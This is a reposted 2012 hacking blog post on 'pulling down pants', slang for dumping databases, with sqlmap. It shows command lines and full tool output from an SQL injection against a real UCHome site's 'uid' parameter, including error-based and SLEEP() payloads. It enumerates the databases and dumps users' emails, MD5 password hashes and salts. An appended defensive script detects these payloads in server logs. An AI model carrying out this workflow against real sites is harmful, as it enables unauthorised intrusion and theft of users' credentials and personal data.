2012-2-10 22:06 Friday: Let's use sqlmap to pull down her pants (dump the database)~

Lately all kinds of "pants-pulling" (dumping databases) are in fashion. Usually you take over the site first and then dump with a script, but sometimes you have no choice and have to dump straight from an injection point, and for that you can't do without the various injection tools.

Yang Fan wrote about how to dump with Pangolin; dumping with sqlmap was originally written up by 07. I've dumped with it before, so here's a quick write-up, heh.

OK, let's demonstrate with a real injection URL (sanitized).

Here's the command log:

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:06:11

[17:06:11] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:06:11] [INFO] testing connection to the target url
[17:06:13] [INFO] testing if the url is stable, wait a few seconds
[17:06:14] [INFO] url is stable
[17:06:14] [INFO] testing if GET parameter 'uid' is dynamic
[17:06:14] [INFO] confirming that GET parameter 'uid' is dynamic
[17:06:15] [WARNING] GET parameter 'uid' is not dynamic
[17:06:15] [INFO] heuristic test shows that GET parameter 'uid' might be injectable (possible DBMS: MySQL)
[17:06:15] [INFO] testing sql injection on GET parameter 'uid'
[17:06:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:06:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:06:18] [INFO] GET parameter 'uid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[17:06:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:06:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:07:18] [INFO] GET parameter 'uid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[17:07:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:07:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'uid' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=222 AND SLEEP(5)
---
[17:07:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:07:26] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:07:26

Note the text in red: it shows that the uid parameter is injectable. OK, it turns out code blocks and colours can't be combined, so look at this line: GET parameter 'uid' is vulnerable.

Good, next list all the databases:

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:08:57

[17:08:57] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:08:57] [INFO] resuming injection data from session file
[17:08:57] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:08:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=222 AND SLEEP(5)
---
[17:08:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:08:59] [INFO] fetching database names
[17:08:59] [INFO] the SQL query used returns 4 entries
[17:09:00] [INFO] retrieved: information_schema
[17:09:00] [INFO] retrieved: mysql
[17:09:00] [INFO] retrieved: test
[17:09:00] [INFO] retrieved: ucenter
available databases [4]:
[*] information_schema
[*] mysql
[*] test
[*] ucenter

[17:09:00] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:09:00

The red part is the list of databases (no colour here either, it's the 'available databases [4]:' part). Then pick the database and list its tables:

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter --tables

I won't paste the result, there are too many tables. Let's go straight to listing the column names of the uc_members table (all the UCHome user data lives there, and that's what we want to pull, heh):

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members --columns

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:11:44

[17:11:44] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:11:44] [INFO] resuming injection data from session file
[17:11:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:11:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=222 AND SLEEP(5)
---
[17:11:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:11:46] [INFO] fetching columns for table 'uc_members' on database 'ucenter'
[17:11:46] [INFO] the SQL query used returns 12 entries
[17:11:46] [INFO] retrieved: uid
[17:11:47] [INFO] retrieved: mediumint(8) unsigned
[17:11:47] [INFO] retrieved: username
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: password
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: email
[17:11:48] [INFO] retrieved: char(32)
[17:11:48] [INFO] retrieved: myid
[17:11:48] [INFO] retrieved: char(30)
[17:11:48] [INFO] retrieved: myidkey
[17:11:48] [INFO] retrieved: char(16)
[17:11:48] [INFO] retrieved: regip
[17:11:49] [INFO] retrieved: char(15)
[17:11:49] [INFO] retrieved: regdate
[17:11:49] [INFO] retrieved: int(10) unsigned
[17:11:49] [INFO] retrieved: lastloginip
[17:11:49] [INFO] retrieved: int(10)
[17:11:49] [INFO] retrieved: lastlogintime
[17:11:50] [INFO] retrieved: int(10) unsigned
[17:11:50] [INFO] retrieved: salt
[17:11:50] [INFO] retrieved: char(6)
[17:11:50] [INFO] retrieved: secques
[17:11:50] [INFO] retrieved: char(8)
Database: ucenter
Table: uc_members
[12 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| lastloginip   | int(10)               |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| password      | char(32)              |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(32)              |
+---------------+-----------------------+

[17:11:51] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:11:51

No need to say more, start dumping. We only need a few of the columns; raise the thread count with --threads and set the range of records to fetch with --start and --stop. Let's pull a few records and see:

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members -C uid,username,password,salt,email --dump --threads=10 --start=1 --stop=50

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:14:22

[17:14:22] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:14:22] [INFO] resuming injection data from session file
[17:14:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:14:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=222 AND SLEEP(5)
---
[17:14:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:14:23] [INFO] fetching columns 'uid, username, password, salt, email' entries for table 'uc_members' on database 'ucenter'
[17:14:24] [INFO] retrieved: 2
[17:14:24] [INFO] retrieved: xx1@163.com
[17:14:24] [INFO] retrieved: 0a9c9d7451d0e78938747083add7fa5a
[17:14:24] [INFO] retrieved: 001c6f
[17:14:24] [INFO] retrieved: asdf@yeah.net
[17:14:25] [INFO] retrieved: 3
[17:14:25] [INFO] retrieved: xx086@163.com
[17:14:25] [INFO] retrieved: 02b3f6122a2882ffdd9ee9f12be60a6e
[17:14:25] [INFO] retrieved: 44d1f1
[17:14:25] [INFO] retrieved: x520@gmail.com
[17:14:25] [INFO] retrieved: 5
[17:14:25] [INFO] retrieved: xlyb@163.com
[17:14:26] [INFO] retrieved: 97226e4861d8e3251af4256781b78868
[17:14:26] [INFO] retrieved: 297944
[17:14:26] [INFO] retrieved: txen@vip.qq.com
[17:14:26] [INFO] retrieved: 73
[17:14:27] [INFO] retrieved: 0x40@qq.com
[17:14:27] [INFO] retrieved: 7e55a749a63c427a767cb1d9aa826f3b
[17:14:27] [INFO] retrieved: d84a57
[17:14:27] [INFO] retrieved: yx@126.com
[17:14:27] [INFO] retrieved: 74
[17:14:28] [INFO] retrieved: x540@qq.com
[17:14:28] [INFO] retrieved: 10bb282c88331c6e95d14700ba9390f0
[17:14:28] [INFO] retrieved: 589369
[17:14:28] [INFO] retrieved: hx@xxoo.org
[17:14:28] [INFO] retrieved: 75
[17:14:28] [INFO] retrieved: 0x840@qq.com
[17:14:29] [INFO] retrieved: 313bfb31b5cd6e58797291665a7b6ed1
[17:14:29] [INFO] retrieved: 229620
[17:14:29] [INFO] retrieved: fexg@xxoo.org
[17:14:29] [INFO] retrieved: 76
[17:14:29] [INFO] retrieved: 0.4.658940@qq.com
[17:14:29] [INFO] retrieved: 1846282a634da3c90af4e0250931b8c2
[17:14:30] [INFO] retrieved: da5025
[17:14:30] [INFO] retrieved: sxg@xxoo.org
[17:14:30] [INFO] retrieved: 77
[17:14:30] [INFO] retrieved: 0x6540@qq.com
[17:14:30] [INFO] retrieved: 8ff58083e52ad0b45c29daa6e6a92b82
[17:14:30] [INFO] retrieved: 024f42
[17:14:31] [INFO] retrieved: chfn@xxoo.org
[17:14:31] [INFO] retrieved: 78
[17:14:31] [INFO] retrieved: f4540@qq.com
[17:14:31] [INFO] retrieved: 46bbf0639b4195c4a5e0520f3d021315
[17:14:31] [INFO] retrieved: fed606
[17:14:31] [INFO] retrieved: rafg2@gmail.com
[17:14:32] [INFO] retrieved: 79
[17:14:32] [INFO] retrieved: 0.4.687540@qq.com
[17:14:32] [INFO] retrieved: 3de40cc0ba602a744eac8ec5a0da20d9
[17:14:32] [INFO] retrieved: ef16e8
[17:14:32] [INFO] retrieved: 123@123.com
[17:14:32] [INFO] retrieved: 80
[17:14:33] [INFO] retrieved: 0.474.6540@qq.com
[17:14:33] [INFO] retrieved: 2b70f5a5ada849ba5ef6fcdb8e04de82
[17:14:33] [INFO] retrieved: f1750c
[17:14:33] [INFO] retrieved: editfrc@xxoo.org
[17:14:33] [INFO] retrieved: 81
[17:14:33] [INFO] retrieved: f8dna@gmail.com
[17:14:34] [INFO] retrieved: 29ca2bc5046ebd4e84ae42e39ac1ed94
[17:14:34] [INFO] retrieved: 93d41a
[17:14:34] [INFO] retrieved: fanfg@xxoo.org
[17:14:34] [INFO] retrieved: 82
[17:14:34] [WARNING] user aborted during enumeration. sqlmap will display partial output
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n
Database: ucenter
Table: uc_members
[12 entries]
+--------------------+----------------------------------+--------+-----+--------------------+
| email              | password                         | salt   | uid | username           |
+--------------------+----------------------------------+--------+-----+--------------------+
| xxoo@yeah.net      | 0a9c9d7451d0e78938747083add7fa5a | 001c6f | 2   | 0-9xx@163.com      |
| xxoo@gmail.com     | 02b3f6122a2882ffdd9ee9f12be60a6e | 44d1f1 | 3   | 0.1086@163.com     |
| xxn@vip.qq.com     | 97226e4861d8e3251af4256781b78868 | 297944 | 5   | 0.1lx@163.com      |
| xxvv@126.com       | 7e55a749a63c427a767cb1d9aa826f3b | d84a57 | 73  | 0.x0@qq.com        |
| asdfasd@xxoo.org   | 10bb282c88331c6e95d14700ba9390f0 | 589369 | 74  | 0.x546540@qq.com   |
| xxg@xxoo.org       | 313bfb31b5cd6e58797291665a7b6ed1 | 229620 | 75  | 0.4.6xxx840@qq.com |
| shi_ying@xxoo.org  | 1846282a634da3c90af4e0250931b8c2 | da5025 | 76  | 0.4xx940@qq.com    |
| chen_shan@xxoo.org | 8ff58083e52ad0b45c29daa6e6a92b82 | 024f42 | 77  | 0xx6540@qq.com     |
| rafikixx@gmail.com | 46bbf0639b4195c4a5e0520f3d021315 | fed606 | 78  | 0x4540@qq.com      |
| 123@123.com        | 3de40cc0ba602a744eac8ec5a0da20d9 | ef16e8 | 79  | x40@qq.com         |
| editorc@xxoo.org   | 2b70f5a5ada849ba5ef6fcdb8e04de82 | f1750c | 80  | xxx@qq.com         |
| fangxg@xxoo.org    | 29ca2bc5046ebd4e84ae42e39ac1ed94 | 93d41a | 81  | 0xxa@gmail.com     |
+--------------------+----------------------------------+--------+-----+--------------------+

[17:14:39] [INFO] Table 'ucenter.uc_members' dumped to CSV file 'C:\sqlmap\output\user.xxoo.org\dump\ucenter\uc_members.csv'
[17:14:39] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

See, it's all in one CSV file. A CSV file is just records separated by commas; you can import it into Excel, Access, MySQL, whatever. Better than Pangolin's HTML, right, heh. Here's a screenshot:

OK, that's all I'll say. sqlmap is actually very powerful, and cross-platform too, dear.
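From the defender's side, every probe in the session above leaves a distinctive trace in the web server's access log. The following Python script is an added example, not part of the original post or of sqlmap: it scans constructed Apache-style log lines for the error-based FLOOR(RAND(0)*2)/information_schema payload, the SLEEP() time-based payload and the UNION NULL probes, and also applies the much simpler check that would have caught all of them at once, a uid that is not a plain integer (uc_members.uid is mediumint(8) unsigned). The IP addresses, timestamps and response sizes in the sample log are made up; the path is the one from the post.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Probe patterns taken from the sqlmap payloads in the session above: error-based
# (FLOOR(RAND(0)*2) over information_schema), time-based (SLEEP), UNION NULL probes.
SIGNATURES = {
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|information_schema", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union-based": re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S),
}
# Parameters the application should only ever see as integers (uid is
# mediumint(8) unsigned in uc_members); anything else is a finding on its own.
INT_PARAMS = {"uid"}
# Apache/nginx common log format (assumption: no virtual-host prefix field).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

def classify_request(path):
    """Return (param, reason) findings for one request path; parse_qs URL-decodes values."""
    findings = []
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for value in values:
            if name in INT_PARAMS and not value.isdigit():
                findings.append((name, "non-integer value for integer parameter"))
            for kind, rx in SIGNATURES.items():
                if rx.search(value):
                    findings.append((name, kind))
    return findings

def scan_log(lines):
    """Run classify_request over access-log lines and attribute each finding to its source IP."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparsable lines rather than aborting the whole scan
        for param, reason in classify_request(m.group("path")):
            hits.append({"ip": m.group("ip"), "param": param, "reason": reason, "status": int(m.group("status"))})
    return hits

# Constructed sample log (IPs, sizes and timestamps made up): a baseline request, three
# probes mirroring the post's payloads as a server would log them, and one ordinary user.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2012:17:06:14 +0800] "GET /ucHome/space.php?uid=222 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Feb/2012:17:06:18 +0800] "GET /ucHome/space.php?uid=222%20AND%20(SELECT%208621%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT%20(CASE%20WHEN%20(8621=8621)%20THEN%201%20ELSE%200%20END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 5210
203.0.113.5 - - [10/Feb/2012:17:07:18 +0800] "GET /ucHome/space.php?uid=222%20AND%20SLEEP(5) HTTP/1.1" 200 5120
203.0.113.5 - - [10/Feb/2012:17:07:20 +0800] "GET /ucHome/space.php?uid=222%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 5120
198.51.100.7 - - [10/Feb/2012:17:08:00 +0800] "GET /ucHome/space.php?uid=17 HTTP/1.1" 200 4990
"""
```

Running `scan_log(SAMPLE_LOG.splitlines())` attributes all six findings to 203.0.113.5 and none to the ordinary user; in the application itself the integer check alone, applied before the value reaches the query, is the fix.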

Reposted from f4ck
